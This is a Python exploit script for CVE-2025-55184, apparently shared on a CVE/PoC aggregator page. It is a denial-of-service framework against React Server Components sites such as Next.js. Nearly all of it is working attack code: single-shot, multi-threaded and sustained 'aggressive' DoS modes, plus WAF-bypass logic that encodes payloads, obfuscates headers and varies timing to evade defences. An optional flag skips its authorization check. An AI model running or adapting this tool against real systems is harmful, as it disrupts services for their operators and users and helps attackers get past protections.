4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve_2025_55184_exploit.py PY
#!/usr/bin/env python3
"""
CVE-2025-55184 Advanced Exploitation Tool
Professional RSC DoS Framework for Ethical Bug Bounty Research

Author: CyberTechAjju
Version: 1.0.0
"""

import requests
import argparse
import sys
import time
import threading
from typing import Dict, List, Optional
from datetime import datetime
import json

# Import custom modules
from modules.ui_manager import UIManager
from modules.waf_bypass import WAFBypass
from modules.utils import Utils


class CVE2025_55184_Exploiter:
    def __init__(self, target: str, config: Dict = None):
        self.target = target
        self.config = config or Utils.load_config()
        self.payloads_db = Utils.load_payloads()
        self.ui = UIManager()
        self.waf = WAFBypass()
        self.utils = Utils()
        
        # Statistics
        self.stats = {
            'total_requests': 0,
            'successful': 0,
            'timeouts': 0,
            'errors': 0,
            'success_rate': 0.0
        }
        
        # Results storage
        self.results = []
        self.target_info = {}
        
    def run(self, mode: str):
        """Main entry point for exploitation"""
        self.ui.show_banner()
        self.ui.show_warning()
        
        # Authorization check
        if self.config.get('ethical_controls', {}).get('require_authorization', True):
            if not self.ui.get_authorization(self.target):
                self.ui.print_error("Authorization denied. Exiting.")
                sys.exit(1)
        
        self.ui.print_success("Authorization confirmed. Proceeding with test...")
        print()
        
        # Parse and validate target
        self.target_info = self._fingerprint_target()
        self.ui.show_target_info(self.target_info)
        print()
        
        # Execute selected mode
        if mode == 'detect':
            self._run_detection()
        elif mode == 'scan':
            self._run_active_scan()
        elif mode == 'single':
            self._run_single_shot()
        elif mode == 'multi':
            self._run_multi_threaded()
        elif mode == 'aggressive':
            self._run_aggressive()
        elif mode == 'waf':
            self._run_waf_bypass()
        elif mode == 'report':
            self._generate_report()
        else:
            self.ui.print_error(f"Unknown mode: {mode}")
    
    def _fingerprint_target(self) -> Dict:
        """Fingerprint target and gather information"""
        with self.ui.show_spinner("Fingerprinting target"):
            target_parsed = self.utils.parse_target(self.target)
            
            # Resolve DNS
            ip_address = self.utils.resolve_dns(target_parsed['hostname'])
            
            # Check if port is open
            port_open = self.utils.check_port_open(
                target_parsed['hostname'], 
                target_parsed['port']
            )
            
            # Try to get server headers
            try:
                response = requests.head(
                    self.target, 
                    timeout=5,
                    headers={'User-Agent': self.waf.get_random_user_agent()}
                )
                server_info = self.utils.fingerprint_server(dict(response.headers))
            except:
                server_info = {'framework': 'Unknown', 'server': 'Unknown'}
            
            return {
                'URL': self.target,
                'IP Address': ip_address or 'Unknown',
                'Port': target_parsed['port'],
                'Port Status': '🟢 Open' if port_open else '🔴 Closed',
                'Framework': server_info.get('framework', 'Unknown'),
                'Server': server_info.get('server', 'Unknown'),
                'Powered By': server_info.get('powered_by', 'Unknown')
            }
    
    def _run_detection(self):
        """Run passive detection mode"""
        self.ui.print_info("Running passive detection (non-invasive)...")
        time.sleep(1)
        
        with self.ui.show_spinner("Detecting framework and vulnerabilities"):
            # Check framework
            framework = self.target_info.get('Framework', 'Unknown').lower()
            
            # Check for RSC indicators
            vulnerable = False
            confidence = 0
            
            if 'next' in framework:
                vulnerable = True
                confidence = 75
            elif 'waku' in framework:
                vulnerable = True
                confidence = 70
            elif 'remix' in framework:
                vulnerable = True
                confidence = 60
            
            time.sleep(2)
        
        print()
        self.ui.show_vulnerability_status(vulnerable, confidence)
        
        if vulnerable:
            self.ui.print_warning("⚠️  Passive indicators suggest potential vulnerability")
            self.ui.print_info("💡 Run active scan for confirmation: --mode scan")
    
    def _run_active_scan(self):
        """Run active vulnerability scan"""
        self.ui.print_info("Running active scan (minimal impact)...")
        print()
        
        # Detect WAF first
        waf_info = self._detect_waf()
        self.ui.show_waf_detection(waf_info)
        print()
        
        # Try multiple payloads
        framework = self.target_info.get('Framework', 'Unknown').lower()
        payloads_to_test = self._get_framework_payloads(framework)
        
        vulnerable = False
        successful_payload = None
        
        with self.ui.create_progress_bar("Testing payloads") as progress:
            task = progress.add_task("[cyan]Scanning...", total=len(payloads_to_test))
            
            for payload_name, payload_data in payloads_to_test.items():
                # Test payload
                result = self._test_payload(payload_name, payload_data, waf_info)
                
                if result['vulnerable']:
                    vulnerable = True
                    successful_payload = payload_name
                    break
                
                progress.update(task, advance=1)
                time.sleep(0.5)
        
        print()
        
        # Show results
        if vulnerable:
            self.ui.show_vulnerability_status(True, 95)
            self.ui.print_success(f"✅ Vulnerability confirmed with payload: {successful_payload}")
            
            # Show payload details
            print()
            self.ui.show_payload_info(successful_payload, payloads_to_test[successful_payload])
        else:
            self.ui.show_vulnerability_status(False)
            self.ui.print_success("Target appears to be patched or not vulnerable")
    
    def _test_payload(self, payload_name: str, payload_data: Dict, waf_info: Dict) -> Dict:
        """Test a single payload"""
        payload = payload_data.get('payload')
        encoding = payload_data.get('encoding', 'none')
        
        # Apply WAF bypass if WAF detected
        if waf_info.get('detected'):
            bypass_strategy = self.waf.generate_bypass_strategy(waf_info.get('type', '').split(',')[0])
            if encoding in bypass_strategy.get('techniques', []):
                payload = self.waf.encode_payload(payload, encoding)
        
        # Prepare request
        framework = self.target_info.get('Framework', 'Unknown').lower()
        headers = self._get_headers(framework, waf_info)
        
        timeout = self.config.get('defaults', {}).get('timeout', 5)
        
        try:
            start_time = time.time()
            response = requests.post(
                self.target,
                files={"0": ("", payload)},
                headers=headers,
                timeout=timeout
            )
            elapsed = time.time() - start_time
            
            self.stats['total_requests'] += 1
            
            # If request completed quickly, likely not vulnerable
            return {
                'vulnerable': False,
                'payload': payload_name,
                'elapsed_time': elapsed,
                'status_code': response.status_code
            }
            
        except requests.exceptions.Timeout:
            # Timeout indicates potential DoS
            self.stats['total_requests'] += 1
            self.stats['successful'] += 1
            self.stats['timeouts'] += 1
            
            return {
                'vulnerable': True,
                'payload': payload_name,
                'elapsed_time': timeout,
                'error': 'Timeout - likely vulnerable'
            }
            
        except requests.exceptions.RequestException as e:
            self.stats['total_requests'] += 1
            self.stats['errors'] += 1
            
            return {
                'vulnerable': False,
                'payload': payload_name,
                'error': str(e)
            }
    
    def _run_single_shot(self):
        """Execute single DoS attack"""
        self.ui.print_warning("⚡ Launching single-shot DoS attack...")
        print()
        
        # Get basic payload
        payload_data = self.payloads_db['payloads']['basic']
        payload = payload_data['payload']
        
        framework = self.target_info.get('Framework', 'Unknown').lower()
        headers = self._get_headers(framework)
        
        timeout = self.config.get('defaults', {}).get('timeout', 5)
        
        with self.ui.show_spinner("Sending exploit payload"):
            try:
                requests.post(
                    self.target,
                    files={"0": ("", payload)},
                    headers=headers,
                    timeout=timeout
                )
                self.ui.print_error("[-] Target not vulnerable (request completed)")
            except requests.exceptions.Timeout:
                self.ui.print_success("[+] DoS successful - Target timed out!")
                self.stats['successful'] += 1
            except requests.exceptions.RequestException as e:
                self.ui.print_error(f"[!] Error: {str(e)}")
    
    def _run_multi_threaded(self):
        """Execute multi-threaded DoS attack"""
        num_threads = self.config.get('attack_modes', {}).get('moderate', {}).get('threads', 5)
        duration = self.config.get('attack_modes', {}).get('moderate', {}).get('duration', 30)
        
        self.ui.print_warning(f"⚡ Launching multi-threaded attack ({num_threads} threads, {duration}s duration)...")
        print()
        
        # Confirmation
        confirm = self.ui.prompt_input(f"This will send multiple requests. Continue? (yes/no)")
        if confirm.lower() != 'yes':
            self.ui.print_info("Attack cancelled")
            return
        
        print()
        
        # Start attack
        stop_event = threading.Event()
        threads = []
        
        def attack_worker():
            payload = self.payloads_db['payloads']['basic']['payload']
            framework = self.target_info.get('Framework', 'Unknown').lower()
            
            while not stop_event.is_set():
                headers = self._get_headers(framework)
                headers = self.waf.obfuscate_headers(headers)
                
                try:
                    requests.post(
                        self.target,
                        files={"0": ("", payload)},
                        headers=headers,
                        timeout=5
                    )
                    self.stats['total_requests'] += 1
                except requests.exceptions.Timeout:
                    self.stats['timeouts'] += 1
                    self.stats['successful'] += 1
                    self.stats['total_requests'] += 1
                except:
                    self.stats['errors'] += 1
                    self.stats['total_requests'] += 1
                
                time.sleep(self.waf.apply_timing_variation())
        
        # Launch threads
        for i in range(num_threads):
            t = threading.Thread(target=attack_worker)
            t.start()
            threads.append(t)
        
        # Monitor progress
        with self.ui.create_progress_bar("Attack in progress") as progress:
            task = progress.add_task("[red]Attacking...", total=duration)
            
            for _ in range(duration):
                time.sleep(1)
                progress.update(task, advance=1)
        
        # Stop threads
        stop_event.set()
        for t in threads:
            t.join()
        
        # Show results
        print()
        self._update_success_rate()
        self.ui.show_result('success', 'Attack completed', 
            f"Total Requests: {self.stats['total_requests']}\n"
            f"Timeouts: {self.stats['timeouts']}\n"
            f"Success Rate: {self.stats['success_rate']:.1f}%"
        )
    
    def _run_aggressive(self):
        """Execute aggressive sustained attack"""
        self.ui.print_error("🔥 AGGRESSIVE MODE - High impact attack")
        self.ui.print_warning("This mode will cause significant service disruption!")
        print()
        
        confirm = self.ui.prompt_input("Type 'I UNDERSTAND THE IMPACT' to continue")
        if confirm != 'I UNDERSTAND THE IMPACT':
            self.ui.print_info("Attack cancelled")
            return
        
        # Use aggressive config
        num_threads = self.config.get('attack_modes', {}).get('aggressive', {}).get('threads', 10)
        duration = self.config.get('attack_modes', {}).get('aggressive', {}).get('duration', 60)
        
        self.ui.print_info(f"Starting aggressive attack: {num_threads} threads, {duration}s duration")
        print()
        
        # Similar to multi-threaded but with all payloads
        self._run_multi_threaded()
    
    def _run_waf_bypass(self):
        """Run WAF detection and bypass testing"""
        self.ui.print_info("🛡️  Running WAF detection and bypass testing...")
        print()
        
        # Detect WAF
        waf_info = self._detect_waf()
        self.ui.show_waf_detection(waf_info)
        print()
        
        if not waf_info['detected']:
            self.ui.print_success("No WAF detected - standard exploitation possible")
            return
        
        # Generate bypass strategy
        waf_type = waf_info.get('type', '').split(',')[0].strip()
        strategy = self.waf.generate_bypass_strategy(waf_type)
        
        self.ui.show_result('info', 'WAF Bypass Strategy', 
            f"WAF Type: {waf_type}\n"
            f"Strategy: {strategy.get('description')}\n"
            f"Techniques: {', '.join(strategy.get('techniques', []))}"
        )
        
        # Test bypass
        print()
        self.ui.print_info("Testing bypass techniques...")
        
        # Try various bypass methods
        vulnerable = False
        for technique in strategy.get('techniques', []):
            payload = self.payloads_db['payloads']['basic']['payload']
            encoded_payload = self.waf.encode_payload(payload, technique)
            
            self.ui.print_info(f"  Trying {technique} encoding...")
            
            # Test it
            result = self._test_payload('basic', {'payload': encoded_payload, 'encoding': technique}, waf_info)
            
            if result.get('vulnerable'):
                vulnerable = True
                self.ui.print_success(f"  ✅ Bypass successful with {technique}!")
                break
            else:
                self.ui.print_error(f"  ✗ {technique} failed")
        
        print()
        if vulnerable:
            self.ui.show_vulnerability_status(True, 85)
        else:
            self.ui.print_warning("WAF bypass attempts unsuccessful")
    
    def _detect_waf(self) -> Dict:
        """Detect WAF protection"""
        try:
            response = requests.get(
                self.target,
                headers={'User-Agent': self.waf.get_random_user_agent()},
                timeout=5
            )
            
            waf_info = self.waf.detect_waf(dict(response.headers), response.text)
            return waf_info
            
        except Exception as e:
            return {'detected': False, 'type': None, 'confidence': 0, 'bypass_available': False}
    
    def _get_headers(self, framework: str, waf_info: Dict = None) -> Dict:
        """Get appropriate headers for framework"""
        headers = {'User-Agent': self.waf.get_random_user_agent()}
        
        if 'next' in framework.lower():
            headers['Next-Action'] = 'x'
        
        # Apply obfuscation if WAF detected
        if waf_info and waf_info.get('detected'):
            headers = self.waf.obfuscate_headers(headers)
        
        return headers
    
    def _get_framework_payloads(self, framework: str) -> Dict:
        """Get relevant payloads for detected framework"""
        all_payloads = self.payloads_db.get('payloads', {})
        framework_payloads = {}
        
        for name, data in all_payloads.items():
            if framework in data.get('frameworks', []):
                framework_payloads[name] = data
        
        # If no specific payloads, return all
        if not framework_payloads:
            return all_payloads
        
        return framework_payloads
    
    def _update_success_rate(self):
        """Update success rate statistic"""
        self.stats['success_rate'] = self.utils.calculate_success_rate(
            self.stats['successful'],
            self.stats['total_requests']
        )
    
    def _generate_report(self):
        """Generate bug bounty report"""
        self.ui.print_info("📊 Generating bug bounty report...")
        
        report_data = {
            'target': self.target,
            'timestamp': self.utils.format_timestamp(),
            'target_info': self.target_info,
            'vulnerable': self.stats['successful'] > 0,
            'confidence': 90 if self.stats['successful'] > 0 else 10,
            'statistics': self.stats,
            'framework': self.target_info.get('Framework', 'Unknown'),
            'server': self.target_info.get('Server', 'Unknown'),
            'ip_address': self.target_info.get('IP Address', 'Unknown')
        }
        
        # Save in multiple formats
        output_dir = self.config.get('reporting', {}).get('output_dir', './reports')
        
        json_path = self.utils.save_report(report_data, 'json', output_dir)
        md_path = self.utils.save_report(report_data, 'markdown', output_dir)
        html_path = self.utils.save_report(report_data, 'html', output_dir)
        
        print()
        self.ui.print_success(f"Report saved:")
        self.ui.print_info(f"  📄 JSON: {json_path}")
        self.ui.print_info(f"  📄 Markdown: {md_path}")
        self.ui.print_info(f"  📄 HTML: {html_path}")


def main():
    parser = argparse.ArgumentParser(
        description='CVE-2025-55184 Advanced Exploitation Tool by CyberTechAjju',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Passive detection
  python cve_2025_55184_exploit.py -t http://localhost:3000 -m detect
  
  # Active scan
  python cve_2025_55184_exploit.py -t http://localhost:3000 -m scan
  
  # Single DoS attack
  python cve_2025_55184_exploit.py -t http://localhost:3000 -m single
  
  # Multi-threaded attack
  python cve_2025_55184_exploit.py -t http://localhost:3000 -m multi
  
  # WAF bypass
  python cve_2025_55184_exploit.py -t http://localhost:3000 -m waf
  
  # Generate report
  python cve_2025_55184_exploit.py -t http://localhost:3000 -m report

Modes:
  detect      - Passive detection (safe, non-invasive)
  scan        - Active vulnerability scanning (minimal impact)
  single      - Single-shot DoS attack (low intensity)
  multi       - Multi-threaded attack (moderate impact)
  aggressive  - Aggressive sustained attack (high impact)
  waf         - WAF detection and bypass testing
  report      - Generate bug bounty report
        """
    )
    
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-m', '--mode', required=True, 
                       choices=['detect', 'scan', 'single', 'multi', 'aggressive', 'waf', 'report'],
                       help='Exploitation mode')
    parser.add_argument('-c', '--config', default='config.json', help='Config file path')
    parser.add_argument('--no-auth', action='store_true', help='Skip authorization prompt (dangerous!)')
    
    args = parser.parse_args()
    
    # Load config
    config = Utils.load_config(args.config)
    
    # Override authorization if requested
    if args.no_auth:
        if 'ethical_controls' not in config:
            config['ethical_controls'] = {}
        config['ethical_controls']['require_authorization'] = False
    
    # Initialize exploiter
    exploiter = CVE2025_55184_Exploiter(args.target, config)
    
    try:
        exploiter.run(args.mode)
    except KeyboardInterrupt:
        print("\n\n")
        exploiter.ui.print_warning("⚠️  Attack interrupted by user")
        sys.exit(0)
    except Exception as e:
        print("\n\n")
        exploiter.ui.print_error(f"Error: {str(e)}")
        sys.exit(1)


if __name__ == "__main__":
    main()